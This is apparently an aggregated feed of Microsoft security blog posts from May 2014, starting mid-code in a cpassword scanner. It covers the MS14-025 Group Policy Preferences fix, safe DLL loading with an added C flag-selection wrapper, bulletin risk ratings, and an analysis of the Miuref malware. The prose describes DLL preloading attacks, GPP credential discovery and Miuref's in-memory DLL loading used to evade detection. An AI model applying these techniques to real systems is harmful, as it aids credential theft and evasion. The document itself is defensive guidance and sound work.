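        printf("%s: <%s> account=\"%s\" cpassword %s\n", label, found[i].element, found[i].account,
               found[i].value_len ? "STORED - delete this GPP item and roll the password" : "empty");
    }
    free(owned);
    return stored ? 1 : 0;   /* non-zero exit when a stored password remains */
}
```

<p>Run it with no arguments to scan the built-in sample, or pass the path of a file such as \\&lt;domain&gt;\SYSVOL\&lt;domain&gt;\Policies\{GPO-GUID}\Machine\Preferences\Groups\Groups.xml (the parts in angle brackets and braces are placeholders). The exit status is 1 when a non-empty cpassword is found, so the check can run from a scheduled job; any hit should be handled the way the post says, by deleting the GPP item and changing the password it carried.</p> <p>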
You can see in the picture below that when attempting to create a local account the &ldquo;username&rdquo; and &ldquo;password&rdquo; fields are disabled. If you attempt to create a user, an error dialog will be displayed.</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/gpp.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/gpp.png" border="0" /></a></p> <p>In addition to the change in behavior, Microsoft is providing customers with two PowerShell scripts. The first script, Enum-SettingsWithCpassword, will search existing GPOs for use of the account password functionality. We urge companies to run this script immediately and delete any vulnerable GPOs it detects.</p> <p>The second script, Invoke-PasswordRoll, can be used to set local administrator passwords on remote systems (something that Group Policy Preferences is commonly used for). The script takes a list of usernames and computers, and uses PowerShell remoting to connect to each computer and change each specified username&rsquo;s password to a randomized password. The username/password combinations will be recorded in a file on disk (which is encrypted, but optionally can be stored in clear-text). 
Note that the script enforces randomized passwords to ensure the local accounts cannot be used in pass-the-hash attacks.</p> <p>You can find both scripts at <a href="http://support.microsoft.com/kb/2962486">http://support.microsoft.com/kb/2962486</a>.</p> <p>- Joe Bialek, MSRC engineering team</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3629593&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">ToolsAttack Surface Reduction Get security updates for May 2014http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/13/get-security-updates-for-may-2014.aspxTue, 13 May 2014 18:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10522825Eve Blakemore12http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10522825http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/13/get-security-updates-for-may-2014.aspx#comments<p>Microsoft releases security updates on the second Tuesday of every month.</p> <p><strong><a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">Skip the details and check for&nbsp;the latest updates.</a></strong></p> <p>This bulletin announces the release of security updates for&nbsp;Windows, Microsoft Office, and other programs.<strong><br /></strong></p> <ul> <li><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn how to get security updates automatically</a></li> <li><a href="http://technet.microsoft.com/en-us/security/bulletin/ms14-may">For IT Pros: Microsoft Security Bulletin Summary for May 2014</a></li> </ul> <p>To get more information about security updates and other privacy and security issues delivered to your email inbox,&nbsp;<a href="http://www.microsoft.com/security/resources/newsletter.aspx">sign up for our newsletter</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10522825" width="1" height="1">updatesmalwaremonthly security updatesautomatic updatingAutomatic UpdatessecurityMicrosoft 
UpdateWindows Updateonline safetypatch Tuesdaycybersecuritycybersafetymalicious softwareMicrosoft Security Updates Released Today to Help Improve Securityhttp://blogs.technet.com/b/security/archive/2014/05/13/security-updates-released-today-to-help-improve-security.aspxTue, 13 May 2014 17:54:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b79f9792-88d7-4366-97e2-06aa1404bdf3Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3629582http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3629582http://blogs.technet.com/b/security/archive/2014/05/13/security-updates-released-today-to-help-improve-security.aspx#comments<p style="text-align:left;">As part of its regularly scheduled security bulletin release, Microsoft <a href="/b/msrc/archive/2014/05/13/the-may-2014-security-updates.aspx">today issued security updates </a>to help protect customers. That said, product support for Windows XP ended last month, and is no longer supported.<br />&nbsp;<br />For more information, see the <a href="http://blogs.windows.com/windows/b/windowsexperience/archive/2014/05/13/windows-xp-pcs-no-longer-receiving-updates.aspx">Windows Experience Blog</a>.</p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/13/security-updates-released-today-to-help-improve-security.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629582&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">security bulletin releaseSecurity Updates Load Library Safelyhttp://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspxTue, 13 May 2014 17:26:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:59432e89-b383-43b2-a5e1-e3dbcbbcea86SRD Blog Author0<p>Dynamically loading libraries in an application can lead to vulnerabilities if not secured properly. 
In this blog post we talk about loading a library with the <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> API and the options it offers to make that load safe.</p> <p><b><span style="text-decoration:underline;">Know the defaults:</span></b></p> <ul> <li>The library file name passed to a <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684175(v=vs.85).aspx">LoadLibrary()</a> / <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> call need not contain an extension. If none is specified, the default library file extension, .DLL, is appended. As a result of this feature, if a null is passed as the library name the loader tries to load &quot;.DLL&quot;, which could be exploited by placing a file named &quot;.DLL&quot; in a directory on the search path.</li> <li>The library file name passed to a <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684175(v=vs.85).aspx">LoadLibrary() </a>/ <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx() </a>call need not specify a directory path. If one is specified, the library is loaded only from that path. 
Otherwise, the following default DLL search order is used:</li> </ul> <ol> <li style="margin-left:30px;">The directory containing the current process image file (the application directory).</li> <li style="margin-left:30px;">The system directory.</li> <li style="margin-left:30px;">The 16-bit system directory.</li> <li style="margin-left:30px;">The Windows directory.</li> <li style="margin-left:30px;">The current working directory.</li> <li style="margin-left:30px;">The directories listed in the PATH environment variable.</li> </ol> <ul> <li>Windows maintains a list of known DLLs, essentially a set of system DLLs, which are guaranteed to load from the system directory when they are referenced by file name alone.</li> <li>The <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682583(v=vs.85).aspx">DllMain()</a> function of the loaded library is called once the library has been loaded into memory.</li> </ul> <p><b><span style="text-decoration:underline;">Control the DLL search order:</span></b></p> <p>There are various options for changing the order in which directories are searched for a library, instead of the default search order used when only a file name is provided.</p> <p>Some of the APIs that can influence the DLL search order/path used by <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> are listed below:</p> <ul> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms686203(v=vs.85).aspx">SetDllDirectory()</a> : Adds a directory to the search path used to locate DLLs for the application</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/hh310515(v=vs.85).aspx">SetDefaultDllDirectories()</a> : Adds a directory to the process DLL search path</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/hh310513(v=vs.85).aspx">AddDllDirectory()</a> : Adds a directory to the process DLL search path</li> <li><a 
href="http://msdn.microsoft.com/en-us/library/windows/desktop/hh310514(v=vs.85).aspx">RemoveDllDirectory() </a>: Removes a directory that was added to the process DLL search path by using <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/hh310513(v=vs.85).aspx">AddDllDirectory()</a></li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa365527(v=vs.85).aspx">SearchPath()</a> : Searches for a specified file in a specified path</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/dd266735(v=vs.85).aspx">SetSearchPathMode()</a> : Sets the per-process mode that the <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa365527(v=vs.85).aspx">SearchPath()</a> function uses when locating files</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa365530(v=vs.85).aspx">SetCurrentDirectory()</a> : Changes the current directory for the current process</li> <li><a href="http://msdn.microsoft.com/en-us/library/system.runtime.interopservices.defaultdllimportsearchpathsattribute(v=vs.110).aspx">DefaultDllImportSearchPathsAttribute </a>: For managed applications, use this attribute to specify the paths searched for DLLs during platform invoke calls</li> </ul> <p><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> provides many flags that alter the default search order. The table below lists most of them and shows the DLL search order that each one produces. 
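</p> <p>To make the flag choice concrete, here is an added example (not code from this post, and not a Microsoft API) of a small wrapper that applies the post&rsquo;s advice before calling LoadLibraryEx(): it refuses an empty name (which the loader would otherwise turn into a search for &quot;.DLL&quot;), restricts a bare file name to the system directory so the current directory and PATH are never searched, resolves the dependencies of a fully qualified DLL only from that DLL&rsquo;s own directory and the system directory, and, when the caller needs only resources, loads the file as a non-executable image so DllMain() never runs. Refusing relative paths that contain directory components is this example&rsquo;s own policy choice. The flag values are the ones from the Windows SDK headers, defined locally so the policy function also compiles and can be tested on a non-Windows host, where the LoadLibraryExW() call itself is compiled out; the file names in main() are illustrative only.</p>

```c
#include <stdio.h>
#include <wchar.h>
#include <wctype.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* LoadLibraryEx flag values from the Windows SDK (libloaderapi.h); defined here
 * only when the SDK header is absent so the policy logic is portable. */
#ifndef LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
#define LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR    0x00000100
#endif
#ifndef LOAD_LIBRARY_SEARCH_SYSTEM32
#define LOAD_LIBRARY_SEARCH_SYSTEM32        0x00000800
#endif
#ifndef LOAD_LIBRARY_AS_IMAGE_RESOURCE
#define LOAD_LIBRARY_AS_IMAGE_RESOURCE      0x00000020
#endif
#ifndef LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE
#define LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE  0x00000040
#endif

typedef enum { LOAD_FOR_EXECUTION, LOAD_FOR_RESOURCES_ONLY } LoadPurpose;

/* True for "C:\dir\x.dll", "C:/dir/x.dll" or a UNC path "\\server\share\x.dll". */
int is_fully_qualified(const wchar_t *name)
{
    if (!name || !name[0]) return 0;
    if (name[0] == L'\\' && name[1] == L'\\') return 1;
    return iswalpha((wint_t)name[0]) && name[1] == L':' &&
           (name[2] == L'\\' || name[2] == L'/');
}

/* Pick LoadLibraryEx flags for a request. Returns 0 (with *flags left at 0) when
 * the request must be refused, 1 when *flags is ready to use. */
int choose_load_flags(const wchar_t *name, LoadPurpose purpose, unsigned long *flags)
{
    *flags = 0;
    /* Empty name: the loader would append the default extension and look for ".DLL". */
    if (!name || !name[0]) return 0;
    /* Relative path with directory parts ("..\x.dll") is resolved against the current
     * directory, which a caller may not control; refusing it is this example's policy. */
    if (!is_fully_qualified(name) && wcspbrk(name, L"\\/")) return 0;
    if (purpose == LOAD_FOR_RESOURCES_ONLY)   /* map as data: no DllMain, nothing executable */
        *flags |= LOAD_LIBRARY_AS_IMAGE_RESOURCE | LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE;
    if (!is_fully_qualified(name))
        *flags |= LOAD_LIBRARY_SEARCH_SYSTEM32;   /* bare name: System32 only, never CWD or PATH */
    else if (purpose == LOAD_FOR_EXECUTION)       /* dependencies: the DLL's own dir + System32 */
        *flags |= LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR | LOAD_LIBRARY_SEARCH_SYSTEM32;
    return 1;
}

#ifdef _WIN32
/* Apply the policy, then call LoadLibraryExW with the chosen flags. */
HMODULE load_library_safely(const wchar_t *name, LoadPurpose purpose)
{
    unsigned long flags;
    if (!choose_load_flags(name, purpose, &flags)) {
        SetLastError(ERROR_INVALID_PARAMETER);
        return NULL;
    }
    return LoadLibraryExW(name, NULL, (DWORD)flags);
}
#endif

int main(void)
{
    /* Illustrative names only; the paths are not taken from any real deployment. */
    static const struct { const wchar_t *name; LoadPurpose purpose; } cases[] = {
        { L"",                                  LOAD_FOR_EXECUTION },
        { L"..\\plugin.dll",                    LOAD_FOR_EXECUTION },
        { L"bcrypt.dll",                        LOAD_FOR_EXECUTION },
        { L"C:\\Program Files\\App\\x.dll",     LOAD_FOR_EXECUTION },
        { L"C:\\Windows\\System32\\user32.dll", LOAD_FOR_RESOURCES_ONLY },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        unsigned long flags;
        int ok = choose_load_flags(cases[i].name, cases[i].purpose, &flags);
        printf("%-40ls -> %s flags=0x%04lx\n", cases[i].name, ok ? "load" : "refuse", flags);
#ifdef _WIN32
        if (ok) {
            HMODULE h = load_library_safely(cases[i].name, cases[i].purpose);
            printf("    LoadLibraryExW: %s\n", h ? "loaded" : "failed");
            if (h) FreeLibrary(h);
        }
#endif
    }
    return 0;
}
```

<p>The LOAD_LIBRARY_SEARCH_* flags are available on Windows 8 and later, and on Windows 7 / Windows Server 2008 R2 only once update KB2533623 is installed; on systems without that support LoadLibraryEx() fails when they are passed, which this wrapper surfaces as an error rather than silently falling back to the default search order.</p> <p>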
Some of the options also take into account the paths set with the APIs mentioned above.</p> <p style="margin-left:30px;"><i><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/loadlibraryex.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/loadlibraryex.png" border="0" /></a></i><i><br />Table 1: The different options to LoadLibraryEx() and how each affects the DLL search order.</i></p> <p><b><span style="text-decoration:underline;">Loading a library as non-executable:</span></b><br />It is not always necessary to load a library as an executable image. <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> makes it possible to load a library as a data file or an image resource, for example. For this purpose, it supports the following options:</p> <ul> <li>LOAD_LIBRARY_AS_DATAFILE</li> <li>LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE</li> <li>LOAD_LIBRARY_AS_IMAGE_RESOURCE</li> <li>DONT_RESOLVE_DLL_REFERENCES</li> </ul> <p>These options treat the file as a plain data file rather than as an executable module. Loading with one of these options does not call DllMain(), and none of the memory the loaded DLL data occupies is marked as executable.</p> <p><b><span style="text-decoration:underline;">Blocking a library from loading:</span></b><br />Sometimes it is necessary to block a library, or an illegitimate library, from loading into an application. The following facilities help with that:</p> <ul> <li><a href="http://technet.microsoft.com/en-us/library/dd723678.aspx">AppLocker</a>:</li> </ul> <ul> <li style="list-style-type:none;"> <ul> <li><a href="http://technet.microsoft.com/en-us/library/dd723678.aspx">AppLocker</a> is a policy-based mechanism to block DLLs from loading into applications. 
These policies can be pushed via Group Policy. <a href="http://technet.microsoft.com/en-us/library/dd723678.aspx">AppLocker</a> can also control executables, scripts and installers.</li> <li>When a new DLL loads, a notification is sent to AppLocker to verify that the DLL is allowed to load. AppLocker calls the Application Identity component to calculate the file attributes. It duplicates the existing process token and replaces the Application Identity attributes in the duplicated token with the attributes of the loaded DLL. AppLocker then evaluates the policy for this DLL, and the duplicated token is discarded. Depending on the result of this check, the system either continues to load the DLL or stops the process.</li> <li>AppLocker can block the DLL based on path, publisher or file hash.</li> </ul> </li> </ul> <ul> <li><a href="http://msdn.microsoft.com/en-us/windows/desktop/aa380259(v=vs.85)#introduction_to_code_signing">Code Signing</a></li> </ul> <ul> <li style="list-style-type:none;"> <ul> <li>Microsoft Authenticode technology can be used to sign the DLL, that is, to attach a digital signature that guarantees its authenticity and integrity.</li> </ul> </li> </ul> <p>To summarize our discussion:</p> <p><b><span style="text-decoration:underline;">To ensure secure loading of libraries</span></b></p> <ul> <li>Use a proper DLL search order.</li> <li>Always specify the fully qualified path when the library location is constant.</li> <li>Load as a data file when that is all that is required.</li> <li>Make use of the code signing infrastructure or AppLocker.</li> </ul> <p><b><span style="text-decoration:underline;">Some common attack vectors we see:</span></b></p> <ul> <li>Application directory attacks, especially involving the temporary internet files or downloads folder. When the application is an installer in particular, it is common for people to download it into the default downloads directory and run it from there. 
Since an attacker can drop a malicious file into that default directory, the application directory is then used to load the DLLs.&nbsp;Manifest and <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682600(v=vs.85).aspx">.local redirection</a> can also be used in this scenario.</li> <li>Loading a DLL from memory, and PowerShell DLL injection, which malware can use to keep the loading of a malicious DLL from being detected.</li> <li>TOCTOU attacks when loading a library from a remote location.</li> </ul> <p>- Swamy Shivaganga Nagaraju, MSRC engineering team</p> Assessing risk for the May 2014 security updates http://blogs.technet.com/b/srd/archive/2014/05/13/assessing-risk-for-the-may-2014-security-updates.aspxTue, 13 May 2014 17:12:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:569017c5-04fb-46f2-85ff-1fa9cd9e35fcSRD Blog Author0<p>Today we released eight security bulletins addressing 13 unique CVEs. Two bulletins have a maximum severity rating of Critical while the other six have a maximum severity rating of Important. The table is designed to help you prioritize the deployment of updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td><b>Most likely attack vector</b></td> <td><b>Max Bulletin Severity</b></td> <td><b>Max exploitability</b></td> <td><b>Likely first 30 days impact</b></td> <td><b>Platform mitigations and key notes</b></td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-029.aspx">MS14-029</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to continue to see exploits leveraging CVE-2014-1815.</td> <td>This update includes the fix for CVE-2014-1776, first addressed by the MS14-021 out-of-band security update on May 1. 
However, MS14-029 is not a cumulative security update. Please first install the last cumulative security update for Internet Explorer before applying this update.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-024.aspx">MS14-024</a> <p>(Common Controls - MSCOMCTL)</p> </td> <td>Victim opens malicious RTF document</td> <td>Important</td> <td>n/a</td> <td>Security Feature Bypass only. Not likely to be exploited directly for code execution.</td> <td>This vulnerability has been leveraged as the ASLR bypass for in-the-wild exploits leveraging the following CVE&rsquo;s: <ul> <li>CVE-2012-0158</li> <li>CVE-2012-1856</li> <li>CVE-2013-3906</li> <li>CVE-2014-1761</li> </ul> <p>Installing this update will prevent this control from being used as an ASLR bypass in any potential future exploits.</p> </td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-025.aspx">MS14-025</a> <p>(Group Policy Preferences)</p> </td> <td>Attacker having already compromised a domain-joined workstation leverages that access to query Group Policy Preferences to potentially discover obfuscated domain account credentials.</td> <td>Important</td> <td>1</td> <td>Likely to continue seeing attackers use this &ldquo;post-exploitation&rdquo; technique to move laterally across enterprise network.</td> <td>Security update prevents the feature from being used in the future but requires administrators to take action to remove passwords previously stored and still available. 
This issue and the methods for preventing its abuse are described in more detail at <a href="http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx">this SRD blog post</a>.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-027.aspx">MS14-027</a> <p>(Shell)</p> </td> <td>Attacker already running code on a machine as low privilege user takes advantage of elevated/high privileged process calling ShellExecute to elevate the low privileged process.</td> <td>Important</td> <td>1</td> <td>Discovered in use by limited number of commodity malware samples. Likely to continue seeing malware attempt to leverage this vulnerability to escalate from low privilege to higher privilege.</td> <td>Observed in the following malware families, each of which is already blocked by Microsoft anti-malware products: <p>Backdoor:Win32/Koceg<br /> Backdoor:Win32/Optixpro.T<br /> Backdoor:Win32/Small<br /> Backdoor:Win32/Xtrat<br /> PWS:Win32/Zbot<br /> Rogue:Win32/Elepater<br /> Rogue:Win32/FakeRean<br /> Trojan:Win32/Dynamer!dtc<br /> Trojan:Win32/Malagent<br /> Trojan:Win32/Malex.gen<br /> Trojan:Win32/Meredrop<br /> Trojan:Win32/Otran<br /> Trojan:Win32/Rimod<br /> Trojan:Win32/Sisron<br /> TrojanDropper:Win32/Sirefef<br /> TrojanSpy:Win32/Juzkapy<br /> VirTool:MSIL/Injector<br /> VirTool:Win32/Obfuscator<br /> Virus:Win32/Neshta<br /> Worm:Win32/Autorun<br /> Worm:Win32/Fasong<br /> Worm:Win32/Ludbaruma<br /> Worm:Win32/Rahiwi</p> </td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-022.aspx">MS14-022</a> <p>(SharePoint)</p> </td> <td>Attacker able to upload arbitrary content to SharePoint server could potentially run code in the context of the SharePoint service account.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploit emerge in next 30 days.</td> <td>Attacker must be granted access to upload content to SharePoint server to trigger vulnerability. 
We haven&rsquo;t typically seen this type of vulnerability widely exploited, despite its exploitable nature.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-023.aspx">MS14-023</a> <p>(Office)</p> </td> <td>An attacker tricks the victim into authenticating to a Microsoft online service in such a way that the authentication token can be captured and replayed by the attacker.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploit emerge in next 30 days.</td> <td>In addition to the token replay vulnerability, this update also addresses a DLL preloading issue involving the Chinese grammar checker DLL. We&rsquo;ve recently developed and posted updated documentation covering the best way to protect applications from this type of attack. You can find that guidance in <a href="http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx">this blog post</a>.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-026.aspx">MS14-026</a> <p>(.NET Framework)</p> </td> <td>A custom application developed using the .NET Remoting feature could grant an attacker code execution in response to specially crafted data.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploit emerge in next 30 days.</td> <td>The .NET Remoting feature is used very rarely, and primarily only in applications written for .NET Framework version 2.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-028.aspx">MS14-028</a> <p>(iSCSI)</p> </td> <td>An attacker able to reach an iSCSI endpoint can potentially cause a persistent resource-exhaustion denial-of-service condition on a Windows host.</td> <td>Important</td> <td>3</td> <td>Denial of service only. 
No chance for direct code execution.</td> <td>&nbsp;</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC engineering team</p>
The May 2014 Security Updates
http://blogs.technet.com/b/msrc/archive/2014/05/13/the-may-2014-security-updates.aspx
Tue, 13 May 2014 17:00:00 GMT
Dustin C. Childs
<p>Today, we released <a href="https://technet.microsoft.com/library/security/ms14-may">eight security bulletins</a> &ndash; two rated Critical and six rated Important &ndash; to address 13 Common Vulnerabilities and Exposures (CVEs) in .NET Framework, Office, SharePoint, Internet Explorer, and Windows. We encourage you to apply all of these updates, but for those who need to prioritize their deployment planning, we recommend focusing on <a href="http://technet.microsoft.com/security/bulletin/ms14-024">MS14-024</a>, <a href="http://technet.microsoft.com/security/bulletin/ms14-025">MS14-025</a> and <a href="http://technet.microsoft.com/security/bulletin/ms14-029">MS14-029</a>.</p> <p>We also have some new security advisories releasing today. <a href="https://technet.microsoft.com/library/security/2871997">Security Advisory 2871997</a> provides an update for Windows 8 and Windows Server 2012 that enhances credential protection and domain authentication controls to reduce credential theft. 
These features are currently available in Windows 8.1 and Windows Server 2012 R2, and we are making them available for other platforms.</p> <p>The .NET Framework update provided by <a href="https://technet.microsoft.com/library/security/2960358">Security Advisory 2960358</a> disables Rivest Cipher 4 (RC4) in Transport Layer Security (TLS). This is similar to what we did with <a href="https://technet.microsoft.com/library/security/2868725">Security Advisory 2868725</a> back in November 2013. The only difference here is that this month&rsquo;s advisory is specific to the .NET Framework.</p> <p>The last of the new advisories is <a href="https://technet.microsoft.com/library/security/2962824">Security Advisory 2962824</a>. This update revokes the digital signature for a specific Unified Extensible Firmware Interface (UEFI) module. Although we are not currently aware of any customer impact, we&rsquo;re taking this step out of an abundance of caution as part of our ongoing efforts to provide the best customer protections available. If you are not running a system that supports UEFI Secure Boot, or you have it disabled, there is no risk and no action for you to take.</p> <p>Finally, we are revising <a href="http://technet.microsoft.com/security/advisory/2755801">Security Advisory 2755801</a> with the latest update for Adobe Flash Player in Internet Explorer. The update addresses the vulnerabilities described in Adobe Security Bulletin APSB14-14. For more information about this update, including download links, see <a href="http://msdn.microsoft.com/2957151">Microsoft Knowledge Base Article 2957151</a>.</p> <p>For those wondering, Windows XP will not be receiving any security updates today. 
For some time we have been recommending customers move to a modern operating system like Windows 7 or Windows 8.1 to help stay safe, and now is a great time to make that move. For more information, see the <a href="http://blogs.windows.com/windows/b/windowsexperience/">Windows Experience Blog</a>.</p> <p>For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by each CVE, visit the <a href="https://technet.microsoft.com/library/security/ms14-may">Microsoft Bulletin Summary Web page</a>. If you are not familiar with how we calculate the Exploit Index (XI), a full description is found <a href="http://technet.microsoft.com/en-us/security/cc998259.aspx">here</a>.</p> <p>Jonathan Ness and I will host the monthly bulletin webcast, scheduled for Wednesday, May 14, 2014, at 11 a.m. PDT. I invite you to <a title="register here" href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572979&amp;Culture=en-US">register here</a> and tune in to learn more about this month&rsquo;s security bulletins and advisories.</p> <p>For all the latest information, you can also follow the MSRC team on Twitter at <a title="@MSFTSecResponse" href="http://www.twitter.com/msftsecresponse">@MSFTSecResponse</a>.</p> <p>Thanks, <br /> <a title="Dustin Childs" href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a> <br /> Group Manager, Response Communications <br /> Microsoft Trustworthy Computing</p>
MSRT May 2014 - Miuref
http://blogs.technet.com/b/mmpc/archive/2014/05/13/msrt-may-2014-miuref.aspx
Tue, 13 May 2014 16:00:00 GMT
msft-mmpc
<div class="ExternalClass6A72656E668A418E9CA180A7EFB05C7A"> <p>Two new families were added to the <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Microsoft Malicious Software Removal Tool</a> (MSRT) this month: <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Filcout">Win32/Filcout</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Miuref">Win32/Miuref</a>.</p> <p>We first detected Filcout in April 2014 after we observed it installing variants of <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Sefnit">Win32/Sefnit</a>. We first detected Miuref in December 2013. This blog will discuss Miuref, a browser hijacker that can perform click fraud and hijack search results.</p> <p>The family has a number of means of getting itself onto a user&rsquo;s computer. 
It can be installed by an exploit such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=JS/Fiexp">JS/Fiexp</a>, distributed via spam emails, rely on social engineering to trick users into running its installer, or be downloaded and run by other malware such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Fareit">Win32/Fareit</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:Win32/Onkods">Win32/Onkods</a>.</p> <p>It is generally distributed packaged in a Nullsoft installer, a commercially available scripted installer that is normally used to install legitimate software. In this case, the installer extracts and runs an executable file with a variable file name. It also extracts one or two data files. One of these data files is named <em>setup.dat</em>. The other data file, if it is present, can have one of the following file names:</p> <ul> <li><em>a</em></li> <li><em>a.dat</em></li> <li><em>b</em></li> <li><em>c</em></li> <li><em>d</em></li> <li><em>data.dat</em></li> <li><em>nk</em></li> <li><em>ns21.dat</em></li> <li><em>padding.txt</em></li> <li><em>rs.dat</em></li> </ul> <p><em>Setup.dat</em> contains a DLL that has been compressed with aPLib and encrypted with RC4. The main function of the executable file is to decrypt and decompress the DLL and manually load it into memory. 
This requires the following steps to ensure the DLL code executes correctly:</p> <ul> <li>Patching the locations of jump and call instructions within the DLL with the correct values.</li> <li>Loading each section of the DLL into memory.</li> <li>Changing the read, write, and execute permissions of the memory containing the DLL copy to match those of each corresponding section of the DLL.</li> <li>Parsing the DLL&rsquo;s import table, and using LoadLibrary and GetProcAddress calls to dynamically import the functions that would normally be statically imported by the DLL.</li> <li>Making a call to the DllMain routine of the DLL, followed by a call to the DllRegisterServer function that it exports.</li> </ul> <p>These steps are normally performed by the <em>kernel32.dll</em> LoadLibrary function, which, when given the filename of a DLL, loads it into memory. By loading the DLL into memory manually instead of calling LoadLibrary, the malware is able to execute the DLL&rsquo;s payload without writing a decrypted copy to disk. This might be an attempt to avoid detection by antimalware products.</p> <p>The DLL component sends details of the affected system to a remote server, including the computer name, machine GUID, and hard disk serial number. If Chrome or Firefox is present, it can install extensions for these browsers. These extensions, which we detect as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:JS/Miuref.A">Trojan:JS/Miuref.A</a> for the Firefox extension and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:JS/Miuref.B">Trojan:JS/Miuref.B</a> for the Chrome extension, can redirect web searches to pages controlled by the attacker. 
